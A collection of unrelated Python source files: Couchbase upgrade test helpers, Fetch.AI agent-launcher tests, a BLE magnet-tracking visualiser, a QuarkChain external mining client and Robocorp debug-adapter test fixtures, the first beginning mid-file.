self.n1ql_server = self.get_nodes_from_services_map(
service_type="n1ql", servers=self.input.servers)
self.n1ql_helper = N1QLHelper(
version="sherlock", shell=None,
use_rest=True, max_verify=self.max_verify,
buckets=self.buckets, item_flag=None,
n1ql_port=self.n1ql_server.n1ql_port, full_docs_list=[],
log=self.log, input=self.input, master=self.master)
def _get_free_nodes(self):
self.log.info("Get free nodes in pool not in cluster yet")
nodes = self.get_nodes_in_cluster_after_upgrade()
free_nodes = copy.deepcopy(self.input.servers)
for node in nodes:
for server in free_nodes:
if str(server.ip).strip() == str(node.ip).strip():
self.log.info("this node {0} is in cluster".format(server))
free_nodes.remove(server)
if not free_nodes:
self.log.info("No free node")
else:
self.log.info("Here is the list of free nodes {0}"
.format(free_nodes))
return free_nodes
def get_nodes_in_cluster_after_upgrade(self, master_node=None):
if master_node is None:
rest = RestConnection(self.master)
else:
rest = RestConnection(master_node)
nodes = rest.node_statuses()
server_set = []
for node in nodes:
for server in self.input.servers:
if server.ip == node.ip:
server_set.append(server)
return server_set
class UpgradeEventTests(UpgradeTests, EventingBaseTest):
pass
|
test_launcher.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains tests for aea launcher."""
import shutil
import time
from multiprocessing import Event
from pathlib import Path
from threading import Thread
from unittest.mock import patch
import pytest
import yaml
from aea.configurations.base import DEFAULT_AEA_CONFIG_FILE
from aea.launcher import AEADirMultiprocessTask, AEALauncher, _run_agent
from aea.test_tools.test_cases import AEATestCaseMany
from tests.common.utils import wait_for_condition
from tests.conftest import CUR_PATH
class TestThreadLauncherMode(AEATestCaseMany):
"""Test launcher in threaded mode."""
RUNNER_MODE = "threaded"
agent_name_1 = "myagent_1"
agent_name_2 = "myagent_2"
failing_agent = "failing_agent"
@classmethod
def setup_class(cls):
"""Set the test up."""
super(AEATestCaseMany, cls).setup_class()
cls.create_agents(cls.agent_name_1, cls.agent_name_2, cls.failing_agent)
cls.set_agent_context(cls.failing_agent)
shutil.copytree(
Path(CUR_PATH, "data", "exception_skill"),
Path(cls.t, cls.failing_agent, "skills", "exception"),
)
config_path = Path(cls.t, cls.failing_agent, DEFAULT_AEA_CONFIG_FILE)
with open(config_path) as fp:
config = yaml.safe_load(fp)
config.setdefault("skills", []).append("fetchai/exception:0.1.0")
yaml.safe_dump(config, open(config_path, "w"))
cls.unset_agent_context()
for agent_name in (cls.agent_name_1, cls.agent_name_2, cls.failing_agent):
cls.set_agent_context(agent_name)
cls.generate_private_key()
cls.add_private_key()
cls.set_runtime_mode_to_async(agent_name)
cls.unset_agent_context()
@classmethod
def set_runtime_mode_to_async(cls, agent_name: str) -> None:
"""Set runtime mode of the agent to async."""
config_path = Path(cls.t, agent_name, DEFAULT_AEA_CONFIG_FILE)
with open(config_path) as fp:
config = yaml.safe_load(fp)
config.setdefault("runtime_mode", "async")
with open(config_path, "w") as fp:
yaml.safe_dump(config, fp)
def test_start_stop(self) -> None:
"""Test agents started stopped."""
try:
runner = AEALauncher(
[self.agent_name_1, self.agent_name_2], self.RUNNER_MODE
)
runner.start(True)
wait_for_condition(lambda: runner.is_running, timeout=10)
assert runner.num_failed == 0
finally:
runner.stop()
assert not runner.is_running
assert runner.num_failed == 0
def test_one_fails(self) -> None:
"""Test agents started, one agent failed, exception is raised."""
try:
runner = AEALauncher(
[self.agent_name_1, self.agent_name_2, self.failing_agent],
self.RUNNER_MODE,
)
with pytest.raises(Exception, match="Expected exception!"):
runner.start()
finally:
runner.stop()
def test_run_agent_in_thread(self):
"""Test agent started and stopped in thread."""
stop_event = Event()
t = Thread(target=_run_agent, args=(self.agent_name_1, stop_event))
t.start()
time.sleep(1)
stop_event.set()
t.join()
class TestAsyncLauncherMode(TestThreadLauncherMode):
"""Test launcher in async mode."""
RUNNER_MODE = "async"
class TestProcessLauncherMode(TestThreadLauncherMode):
"""Test launcher in process mode."""
RUNNER_MODE = "multiprocess"
def test_task_stop():
"""Test AEADirMultiprocessTask.stop when not started."""
task = AEADirMultiprocessTask("some")
assert not task.failed
with patch.object(task._stop_event, "set") as set_mock:
task.stop()
set_mock.assert_not_called()
|
real_time_pos.py
|
from os import read
import queue
from codetiming import Timer
import asyncio
import matplotlib.pyplot as plt
import numpy as np
import sys
import random
from itertools import count
import time
from matplotlib.animation import FuncAnimation
from numpy.core.numeric import True_
import matplotlib
import queue
import asyncio
import struct
import os
import sys
import time
import datetime
import atexit
import time
import numpy as np
from bleak import BleakClient
import matplotlib.pyplot as plt
from bleak import exc
import pandas as pd
import atexit
from multiprocessing import Pool
import multiprocessing
from src.solver import Solver_jac, Solver
from src.filter import Magnet_KF, Magnet_UKF
from src.preprocess import Calibrate_Data
from config import pSensor_smt, pSensor_large_smt, pSensor_small_smt, pSensor_median_smt, pSensor_imu
import cppsolver as cs
'''The parameter user should change accordingly'''
# Change pSensor if a different sensor layout is used
pSensor = pSensor_large_smt
# Change this parameter for different initial value for 1 magnet
params = np.array([40 / np.sqrt(2) * 1e-6, 40 / np.sqrt(2) * 1e-6,
0, np.log(3), 1e-2 * (-2), 1e-2 * (2), 1e-2 * (11), 0, 0])
# Change this parameter for different initial value for 2 magnets
params2 = np.array([
40 / np.sqrt(2) * 1e-6, 40 / np.sqrt(2) * 1e-6, 0, np.log(3),
1e-2 * 6, 1e-2 * 0, 1e-2 * (-1), 0, 0,
1e-2 * 5, 1e-2 * (4), 1e-2 * (-1), 0, 0,
])
# Your adafruit nrd52832 ble address
ble_address = "2A59A2D4-BCD8-4AF7-B750-E51195C1CA13"
# Absolute or relative path to the calibration data, stored in CSV
cali_path = 'Path to the calibration data, stored in CSV'
'''The calculation and visualization process'''
t = 0
matplotlib.use('Qt5Agg')
# Nordic NUS characteristic for RX, which should be writable
UART_RX_UUID = "6e400002-b5a3-f393-e0a9-e50e24dcca9e"
# Nordic NUS characteristic for TX, which should be readable
UART_TX_UUID = "6e400003-b5a3-f393-e0a9-e50e24dcca9e"
result = []
worklist = multiprocessing.Manager().Queue()
results = multiprocessing.Manager().Queue()
results2 = multiprocessing.Manager().Queue()
def end():
print('End of the program')
sys.exit(0)
def calculation_parallel(magcount=1, use_kf=0, use_wrist=False):
global worklist
global params
global params2
global results
global results2
global pSensor
myparams1 = params
myparams2 = params2
while True:
if not worklist.empty():
datai = worklist.get()
datai = datai.reshape(-1, 3)
# resulti [gx, gy, gz, m, x0,y0,z0, theta0, phy0, x1, y1, z1, theta1, phy1]
if magcount == 1:
if np.max(np.abs(myparams1[4:7])) > 1:
myparams1 = params
resulti = cs.solve_1mag(
datai.reshape(-1), pSensor.reshape(-1), myparams1)
myparams1 = resulti
result = [resulti[4] * 1e2,
resulti[5] * 1e2, resulti[6] * 1e2]
results.put(result)
print("Position: {:.2f}, {:.2f}, {:.2f}, dis={:.2f}".format(
result[0],
result[1],
result[2],
np.sqrt(
result[0] ** 2 + result[1] ** 2 + result[2] ** 2)))
elif magcount == 2:
if np.max(
np.abs(myparams2[4: 7])) > 1 or np.max(
np.abs(myparams2[9: 12])) > 1:
myparams2 = params2
resulti = cs.solve_2mag(
datai.reshape(-1), pSensor.reshape(-1), myparams2)
myparams2 = resulti
result = [resulti[4] * 1e2,
resulti[5] * 1e2, resulti[6] * 1e2]
results.put(result)
result2 = [resulti[9] * 1e2,
resulti[10] * 1e2, resulti[11] * 1e2]
results2.put(result2)
print(
"Mag 1 Position: {:.2f}, {:.2f}, {:.2f}, dis={:.2f} \n Mag 2 Position: {:.2f}, {:.2f}, {:.2f}, dis={:.2f}". format(
result[0],
result[1],
result[2],
np.sqrt(
result[0] ** 2 +
result[1] ** 2 +
result[2] ** 2),
result2[0],
result2[1],
result2[2],
np.sqrt(
result2[0] ** 2 +
result2[1] ** 2 +
result2[2] ** 2)))
async def task(name, work_queue):
timer = Timer(text=f"Task {name} elapsed time: {{: .1f}}")
while not work_queue.empty():
delay = await work_queue.get()
print(f"Task {name} running")
timer.start()
await asyncio.sleep(delay)
timer.stop()
async def show_mag(magcount=1):
global t
global pSensor
global results
global results2
myresults = np.array([[0, 0, 10]])
myresults2 = np.array([[0, 0, 10]])
fig = plt.figure(figsize=(5, 5))
ax = fig.gca(projection='3d')
# TODO: add title
ax.set_xlabel('x(cm)')
ax.set_ylabel('y(cm)')
ax.set_zlabel('z(cm)')
ax.set_xlim([-20, 20])
ax.set_ylim([-20, 20])
ax.set_zlim([-10, 40])
Xs = 1e2 * pSensor[:, 0]
Ys = 1e2 * pSensor[:, 1]
Zs = 1e2 * pSensor[:, 2]
XXs = Xs
YYs = Ys
ZZs = Zs
ax.scatter(XXs, YYs, ZZs, c='r', s=1, alpha=0.5)
(magnet_pos,) = ax.plot(t / 100.0 * 5, t / 100.0 * 5, t /
100.0 * 5, linewidth=3, animated=True)
if magcount == 2:
(magnet_pos2,) = ax.plot(t / 100.0 * 5, t / 100.0 * 5, t /
100.0 * 5, linewidth=3, animated=True)
plt.show(block=False)
plt.pause(0.1)
bg = fig.canvas.copy_from_bbox(fig.bbox)
ax.draw_artist(magnet_pos)
fig.canvas.blit(fig.bbox)
# timer = Timer(text=f"frame elapsed time: {{: .5f}}")
while True:
# timer.start()
fig.canvas.restore_region(bg)
# update the artist, neither the canvas state nor the screen have
# changed
# update myresults
if not results.empty():
myresult = results.get()
myresults = np.concatenate(
[myresults, np.array(myresult).reshape(1, -1)])
if myresults.shape[0] > 30:
myresults = myresults[-30:]
x = myresults[:, 0]
y = myresults[:, 1]
z = myresults[:, 2]
xx = x
yy = y
zz = z
magnet_pos.set_xdata(xx)
magnet_pos.set_ydata(yy)
magnet_pos.set_3d_properties(zz, zdir='z')
# re-render the artist, updating the canvas state, but not the screen
ax.draw_artist(magnet_pos)
if magcount == 2:
if not results2.empty():
myresult2 = results2.get()
myresults2 = np.concatenate(
[myresults2, np.array(myresult2).reshape(1, -1)])
if myresults2.shape[0] > 30:
myresults2 = myresults2[-30:]
x = myresults2[:, 0]
y = myresults2[:, 1]
z = myresults2[:, 2]
xx = x
yy = y
zz = z
magnet_pos2.set_xdata(xx)
magnet_pos2.set_ydata(yy)
magnet_pos2.set_3d_properties(zz, zdir='z')
ax.draw_artist(magnet_pos2)
# copy the image to the GUI state, but screen might not changed yet
fig.canvas.blit(fig.bbox)
# flush any pending GUI events, re-painting the screen if needed
fig.canvas.flush_events()
await asyncio.sleep(0)
# timer.stop()
def notification_handler(sender, data):
"""Simple notification handler which prints the data received."""
global pSensor
global worklist
num = int(pSensor.size/3)
all_data = []
sensors = np.zeros((num, 3))
current = [datetime.datetime.now()]
calibration = np.load('result/calibration.npz')
offset = calibration['offset'].reshape(-1)
scale = calibration['scale'].reshape(-1)
for i in range(num):
sensors[i, 0] = struct.unpack('f', data[12 * i: 12 * i + 4])[0]
sensors[i, 1] = struct.unpack('f', data[12 * i + 4: 12 * i + 8])[0]
sensors[i, 2] = struct.unpack('f', data[12 * i + 8: 12 * i + 12])[0]
# print("Sensor " + str(i+1)+": "+str(sensors[i, 0]) + ", " + str(sensors[i, 1]) + ", " + str(sensors[i, 2]))
current.append(
"(" + str(sensors[i, 0]) + ", " + str(sensors[i, 1]) + ", " +
str(sensors[i, 2]) + ")")
# battery_voltage = struct.unpack('f', data[12 * num: 12 * num + 4])[0]
# print("Battery voltage: " + str(battery_voltage))
sensors = sensors.reshape(-1)
sensors = (sensors - offset) / scale * np.mean(scale)
if len(all_data) > 3:
sensors = (sensors + all_data[-1] + all_data[-2]) / 3
all_data.append(sensors)
worklist.put(sensors)
# print("############")
async def run_ble(address, loop):
async with BleakClient(address, loop=loop) as client:
# wait for BLE client to be connected
x = await client.is_connected()
print("Connected: {0}".format(x))
print("Press Enter to quit...")
# wait for data to be sent from client
await client.start_notify(UART_TX_UUID, notification_handler)
while True:
await asyncio.sleep(0.01)
# data = await client.read_gatt_char(UART_TX_UUID)
async def main(magcount=1):
"""
This is the main entry point for the program
"""
# Address of the BLE device
global ble_address
address = (ble_address)
# Run the tasks
with Timer(text="\nTotal elapsed time: {:.1f}"):
multiprocessing.Process(
target=calculation_parallel, args=(magcount, 1, False)).start()
await asyncio.gather(
asyncio.create_task(run_ble(address, asyncio.get_event_loop())),
asyncio.create_task(show_mag(magcount)),
)
if __name__ == '__main__':
if True:
calibration = Calibrate_Data(cali_path)
[offset, scale] = calibration.cali_result()
if not os.path.exists('result'):
os.makedirs('result')
np.savez('result/calibration.npz', offset=offset, scale=scale)
print(np.mean(scale))
asyncio.run(main(1)) # For tracking 1 magnet
# asyncio.run(main(2)) # For tracking 2 magnet
|
external_miner.py
|
import argparse
import json
import logging
import random
import threading
import time
from typing import Dict, Optional, List, Tuple
import jsonrpcclient
from aioprocessing import AioProcess, AioQueue
from quarkchain.cluster.miner import Miner, MiningWork, MiningResult
from quarkchain.config import ConsensusType
# disable jsonrpcclient verbose logging
logging.getLogger("jsonrpcclient.client.request").setLevel(logging.WARNING)
logging.getLogger("jsonrpcclient.client.response").setLevel(logging.WARNING)
logger = logging.getLogger("quarkchain.tools.external_miner")
logger.setLevel(logging.INFO)
def get_work_rpc(
shard: Optional[int], host: str = "localhost", jrpc_port: int = 38391
) -> MiningWork:
json_rpc_url = "http://{}:{}".format(host, jrpc_port)
header_hash, height, diff = jsonrpcclient.request(
json_rpc_url, "getWork", hex(shard) if shard is not None else None
)
return MiningWork(bytes.fromhex(header_hash[2:]), int(height, 16), int(diff, 16))
def submit_work_rpc(
shard: Optional[int],
res: MiningResult,
host: str = "localhost",
jrpc_port: int = 38391,
) -> bool:
json_rpc_url = "http://{}:{}".format(host, jrpc_port)
success = jsonrpcclient.request(
json_rpc_url,
"submitWork",
hex(shard) if shard is not None else None,
"0x" + res.header_hash.hex(),
hex(res.nonce),
"0x" + res.mixhash.hex(),
)
return success
def repr_shard(shard_id):
return "SHARD %s" % shard_id if shard_id is not None else "ROOT"
class ExternalMiner(threading.Thread):
"""One external miner could handles multiple shards."""
def __init__(self, configs):
super().__init__()
self.configs = configs
self.input_q = AioQueue()
self.output_q = AioQueue()
self.process = None
def run(self):
work_map = {} # type: Dict[bytes, Tuple[MiningWork, int]]
# start the thread to get work
def get_work():
# hash -> shard
nonlocal work_map, self
# shard -> work
existing_work = {} # type: Dict[int, MiningWork]
while True:
for config in self.configs:
shard_id = config["shard_id"]
try:
work = get_work_rpc(shard_id)
except Exception:
# ignore network errors and try next one
logger.error("Failed to get work")
continue
# skip duplicate work
if (
shard_id in existing_work
and existing_work[shard_id].hash == work.hash
):
continue
mining_params = {
"consensus_type": config["consensus_type"],
"shard": shard_id,
}
if self.process:
self.input_q.put((work, mining_params))
logger.info(
"Pushed work to %s height %d"
% (repr_shard(shard_id), work.height)
)
else:
# start the process to mine
self.process = AioProcess(
target=Miner.mine_loop,
args=(work, mining_params, self.input_q, self.output_q),
)
self.process.start()
logger.info(
"Started mining process for %s" % repr_shard(shard_id)
)
# bookkeeping
existing_work[shard_id] = work
work_map[work.hash] = (work, shard_id)
# random sleep 1~2 secs
time.sleep(random.uniform(1.0, 2.0))
get_work_thread = threading.Thread(target=get_work)
get_work_thread.start()
# the current thread handles the work submission
while True:
res = self.output_q.get(block=True) # type: MiningResult
work, shard_id = work_map[res.header_hash]
while True:
try:
success = submit_work_rpc(shard_id, res)
break
except Exception:
logger.error("Failed to submit work, backing off...")
time.sleep(0.5)
logger.info(
"Mining result submission result: %s for %s height %d"
% (
"success" if success else "failure",
repr_shard(shard_id),
work.height,
)
)
del work_map[res.header_hash] # clear bookkeeping
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--config",
required=True,
type=str,
help="path to config json file, same as the config running cluster",
)
parser.add_argument("--worker", type=int, help="number of workers", default=8)
args = parser.parse_args()
with open(args.config) as f:
config_json = json.load(f)
worker_configs = [[] for _ in range(args.worker)] # type: List[List[Dict]]
for i, shard_config in enumerate(config_json["QUARKCHAIN"]["SHARD_LIST"]):
config = {
"shard_id": i,
"consensus_type": ConsensusType[shard_config["CONSENSUS_TYPE"]],
}
worker_configs[i % args.worker].append(config)
# FIXME: manually add another worker dedicated for root chain
worker_configs.append(
[
{
"shard_id": None,
"consensus_type": ConsensusType[
config_json["QUARKCHAIN"]["ROOT"]["CONSENSUS_TYPE"]
],
}
]
)
for config_list in worker_configs:
ext_miner = ExternalMiner(config_list)
ext_miner.start()
|
fixtures.py
|
# coding: utf-8
# Original work Copyright Fabio Zadrozny (EPL 1.0)
# See ThirdPartyNotices.txt in the project root for license information.
# All modifications Copyright (c) Robocorp Technologies Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http: // www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from robocorp_ls_core.unittest_tools.fixtures import TIMEOUT
from robocorp_ls_core.subprocess_wrapper import subprocess
from collections import namedtuple
import queue
import threading
import pytest # type: ignore
import sys
import os
from typing import Dict, Optional, Iterable
from robocorp_ls_core.options import DEFAULT_TIMEOUT
__file__ = os.path.abspath(__file__)
if __file__.endswith((".pyc", ".pyo")):
__file__ = __file__[:-1]
_JsonHit = namedtuple("_JsonHit", "thread_id, frame_id, stack_trace_response")
@pytest.fixture
def dap_logs_dir(tmpdir):
import locale
logs_directory = tmpdir.join("logs_adapter")
logs_directory.mkdir()
yield logs_directory
for name in os.listdir(str(logs_directory)):
sys.stderr.write("\n--- %s contents:\n" % (name,))
if name in ("output.xml", "report.html", "log.html"):
sys.stderr.write("--- Not printed --- \n\n")
continue
with open(str(logs_directory.join(name)), "rb") as stream:
contents = stream.read().decode(locale.getpreferredencoding(), "replace")
sys.stderr.write(contents)
sys.stderr.write("\n\n")
@pytest.fixture
def dap_log_file(dap_logs_dir):
filename = str(dap_logs_dir.join("robotframework_dap_tests.log"))
sys.stderr.write("Logging subprocess to: %s\n" % (filename,))
yield filename
@pytest.fixture
def dap_process_stderr_file(dap_logs_dir):
filename = str(dap_logs_dir.join("robotframework_dap_tests_stderr.log"))
sys.stderr.write("Output subprocess stderr to: %s\n" % (filename,))
with open(filename, "wb") as stream:
yield stream
@pytest.fixture
def dap_process(dap_log_file, dap_process_stderr_file):
from robotframework_debug_adapter import __main__
from robocorp_ls_core.basic import kill_process_and_subprocesses
env = os.environ.copy()
env["ROBOTFRAMEWORK_DAP_LOG_LEVEL"] = "3"
env["ROBOTFRAMEWORK_DAP_LOG_FILENAME"] = dap_log_file
env["PYDEVD_DEBUG_FILE"] = dap_log_file
env["PYDEVD_DEBUG"] = "1"
dap_process = subprocess.Popen(
[sys.executable, "-u", __main__.__file__],
stdout=subprocess.PIPE,
stderr=dap_process_stderr_file,
stdin=subprocess.PIPE,
env=env,
)
assert dap_process.returncode is None
yield dap_process
if dap_process.returncode is None:
kill_process_and_subprocesses(dap_process.pid)
class _DebuggerAPI(object):
def __init__(
self,
reader=None,
writer=None,
write_queue=None,
read_queue=None,
dap_resources_dir=None,
):
self.reader = reader
self.writer = writer
self.write_queue = write_queue
self.read_queue = read_queue
self.all_messages_read = []
self.target = None
self.dap_resources_dir = dap_resources_dir
def write(self, msg):
"""
:param BaseSchema msg:
The message to be written.
"""
self.write_queue.put(msg)
return msg
def read(self, expect_class=None, accept_msg=None):
"""
Waits for a message and returns it (may throw error if there's a timeout waiting for the message).
"""
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import OutputEvent
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
ConfigurationDoneResponse,
)
while True:
msg = self.read_queue.get(timeout=TIMEOUT)
if hasattr(msg, "to_dict"):
sys.stderr.write("Read: %s\n\n" % (msg.to_dict(),))
else:
sys.stderr.write("Read: %s\n\n" % (msg,))
self.all_messages_read.append(msg)
if expect_class is not None or accept_msg is not None:
if self._matches(msg, expect_class, accept_msg):
return msg
# Skip OutputEvent and ConfigurationDoneResponse. Other events must match.
if not isinstance(msg, (OutputEvent, ConfigurationDoneResponse)):
raise AssertionError(
"Received: %s when expecting: %s" % (msg, expect_class)
)
else:
# expect_class and accept_msg are None
return msg
return msg
def assert_message_found(self, expect_class=None, accept_msg=None):
for msg in self.all_messages_read:
if self._matches(msg, expect_class, accept_msg):
return True
raise AssertionError("Did not find expected message.")
def _matches(self, msg, expect_class=None, accept_msg=None):
if (expect_class is None or isinstance(msg, expect_class)) and (
accept_msg is None or accept_msg(msg)
):
return True
return False
def get_dap_case_file(self, filename, must_exist=True):
import os.path
ret = os.path.join(self.dap_resources_dir, filename)
if must_exist:
assert os.path.exists(ret), "%s does not exist." % (ret,)
return ret
def initialize(self):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import InitializeRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
InitializeRequestArguments,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
InitializeResponse,
)
self.write(
InitializeRequest(
InitializeRequestArguments(
adapterID="robotframework-lsp-adapter",
clientID="Stub",
clientName="stub",
locale="en-us",
linesStartAt1=True,
columnsStartAt1=True,
pathFormat="path",
supportsVariableType=True,
supportsVariablePaging=True,
supportsRunInTerminalRequest=True,
)
)
)
initialize_response = self.read(InitializeResponse)
assert isinstance(initialize_response, InitializeResponse)
assert initialize_response.request_seq == 0
assert initialize_response.success
assert initialize_response.command == "initialize"
def configuration_done(self):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
ConfigurationDoneRequest,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
ConfigurationDoneResponse,
)
self.write(ConfigurationDoneRequest())
def step_in(self, thread_id):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import StepInRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import StepInArguments
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import StepInResponse
arguments = StepInArguments(threadId=thread_id)
self.write(StepInRequest(arguments))
self.read(StepInResponse)
def step_next(self, thread_id):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import NextRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import NextArguments
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import NextResponse
arguments = NextArguments(threadId=thread_id)
self.write(NextRequest(arguments))
self.read(NextResponse)
def step_out(self, thread_id):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import StepOutArguments
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import StepOutRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import StepOutResponse
arguments = StepOutArguments(threadId=thread_id)
self.write(StepOutRequest(arguments))
self.read(StepOutResponse)
def continue_event(self, thread_id, accept_terminated=False):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import ContinueRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import ContinueArguments
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import ContinueResponse
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import TerminatedEvent
arguments = ContinueArguments(thread_id)
self.write(ContinueRequest(arguments))
expected = [ContinueResponse]
if accept_terminated:
expected.append(TerminatedEvent)
return self.read(expect_class=tuple(expected))
def launch(
self,
target,
debug=True,
success=True,
terminal="none",
args: Optional[Iterable[str]] = None,
):
"""
:param args:
The arguments to the launch (for instance:
["--variable", "my_var:22"]
)
"""
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import LaunchRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
LaunchRequestArguments,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import LaunchResponse
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
RunInTerminalRequest,
)
from robocorp_ls_core.basic import as_str
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import InitializedEvent
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import Response
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import ProcessEvent
launch_args = LaunchRequestArguments(
__sessionId="some_id", noDebug=not debug, target=target, terminal=terminal
)
if args:
launch_args.kwargs["args"] = args
self.write(LaunchRequest(launch_args))
if terminal == "external":
run_in_terminal_request = self.read(RunInTerminalRequest)
env = os.environ.copy()
for key, val in run_in_terminal_request.arguments.env.to_dict().items():
env[as_str(key)] = as_str(val)
cwd = run_in_terminal_request.arguments.cwd
popen_args = run_in_terminal_request.arguments.args
subprocess.Popen(popen_args, cwd=cwd, env=env)
if success:
# Initialized is sent just before the launch response (at which
# point it's possible to send breakpoints).
self.read(ProcessEvent)
event = self.read(InitializedEvent)
assert isinstance(event, InitializedEvent)
if success:
launch_response = self.read(LaunchResponse)
else:
launch_response = self.read(Response)
assert launch_response.success == success
def list_threads(self):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import ThreadsRequest
return self.wait_for_response(self.write(ThreadsRequest()))
def set_breakpoints(self, target, lines, line_to_kwargs={}):
import os.path
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
SetBreakpointsRequest,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
SetBreakpointsArguments,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import Source
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import SourceBreakpoint
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
SetBreakpointsResponse,
)
if isinstance(lines, int):
lines = (lines,)
assert isinstance(lines, (list, tuple))
self.write(
SetBreakpointsRequest(
SetBreakpointsArguments(
source=Source(name=os.path.basename(target), path=target),
lines=lines,
breakpoints=[
SourceBreakpoint(
line=line, **line_to_kwargs.get(line, {})
).to_dict()
for line in lines
],
)
)
)
response = self.read(SetBreakpointsResponse)
assert len(response.body.breakpoints) == len(lines)
def wait_for_response(self, request, response_class=None):
from robocorp_ls_core.debug_adapter_core.dap.dap_base_schema import (
get_response_class,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import Response
if response_class is None:
response_class = get_response_class(request)
def accept_message(response):
if isinstance(request, dict):
if response.request_seq == request["seq"]:
return True
else:
if response.request_seq == request.seq:
return True
return False
return self.read((response_class, Response), accept_message)
def get_stack_as_json_hit(self, thread_id):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
StackTraceArguments,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import StackTraceRequest
stack_trace_request = self.write(
StackTraceRequest(StackTraceArguments(threadId=thread_id))
)
# : :type stack_trace_response: StackTraceResponse
# : :type stack_trace_response_body: StackTraceResponseBody
# : :type stack_frame: StackFrame
stack_trace_response = self.wait_for_response(stack_trace_request)
stack_trace_response_body = stack_trace_response.body
assert len(stack_trace_response_body.stackFrames) > 0
stack_frame = next(iter(stack_trace_response_body.stackFrames))
return _JsonHit(
thread_id=thread_id,
frame_id=stack_frame["id"],
stack_trace_response=stack_trace_response,
)
def wait_for_thread_stopped(
self, reason="breakpoint", line=None, file=None, name=None
):
"""
:param file:
utf-8 bytes encoded file or unicode
"""
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import StoppedEvent
stopped_event = self.read(StoppedEvent)
assert stopped_event.body.reason == reason
json_hit = self.get_stack_as_json_hit(stopped_event.body.threadId)
if file is not None:
path = json_hit.stack_trace_response.body.stackFrames[0]["source"]["path"]
if not path.endswith(file):
raise AssertionError("Expected path: %s to end with: %s" % (path, file))
if name is not None:
assert json_hit.stack_trace_response.body.stackFrames[0]["name"] == name
if line is not None:
found_line = json_hit.stack_trace_response.body.stackFrames[0]["line"]
if not isinstance(line, (tuple, list)):
line = [line]
assert found_line in line, "Expect to break at line: %s. Found: %s" % (
line,
found_line,
)
return json_hit
def get_line_index_with_content(self, line_content, filename=None):
"""
:return the line index which has the given content (1-based).
"""
if filename is None:
filename = self.target
with open(filename, "r") as stream:
for i_line, line in enumerate(stream):
if line_content in line:
return i_line + 1
raise AssertionError("Did not find: %s in %s" % (line_content, filename))
def get_name_to_scope(self, frame_id):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import ScopesArguments
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import ScopesRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import Scope
scopes_request = self.write(ScopesRequest(ScopesArguments(frame_id)))
scopes_response = self.wait_for_response(scopes_request)
scopes = scopes_response.body.scopes
name_to_scopes = dict((scope["name"], Scope(**scope)) for scope in scopes)
assert len(scopes) == 3
assert sorted(name_to_scopes.keys()) == ["Arguments", "Builtins", "Variables"]
assert name_to_scopes["Arguments"].presentationHint == "locals"
return name_to_scopes
def get_name_to_var(self, variables_reference):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import Variable
variables_response = self.get_variables_response(variables_reference)
return dict(
(variable["name"], Variable(**variable))
for variable in variables_response.body.variables
)
def get_arguments_name_to_var(self, frame_id: int) -> Dict[str, str]:
name_to_scope = self.get_name_to_scope(frame_id)
return self.get_name_to_var(name_to_scope["Arguments"].variablesReference)
def get_variables_name_to_var(self, frame_id: int) -> Dict[str, str]:
name_to_scope = self.get_name_to_scope(frame_id)
return self.get_name_to_var(name_to_scope["Variables"].variablesReference)
def get_builtins_name_to_var(self, frame_id: int) -> Dict[str, str]:
name_to_scope = self.get_name_to_scope(frame_id)
return self.get_name_to_var(name_to_scope["Builtins"].variablesReference)
